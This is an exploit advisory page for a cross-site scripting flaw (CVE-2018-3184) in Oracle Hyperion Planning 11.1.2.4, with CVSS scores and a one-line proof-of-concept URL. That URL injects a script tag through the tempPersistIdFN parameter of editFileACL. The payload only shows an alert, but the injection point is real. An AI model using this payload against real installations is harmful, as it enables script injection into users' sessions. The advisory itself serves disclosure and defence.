Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting

2018.10.27
Credit: Hasan Alqawzai
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2018-3184
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting # Date: 2018-10-16 # Exploit Author: Hasan Alqawzai # Vendor Homepage: https://www.oracle.com # Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/ # Version: 11.1.2.4 # Tested on: Windows # CVE : CVE-2018-3184 # Description : It was detected cross-site scripting , which allows an attacker to execute a dynamic script in the context of the application. # Prerequisites : Access to Oracle Hyperion # PoC Exploit: XSS https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";</script><script>alert(/hasan/)</script>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top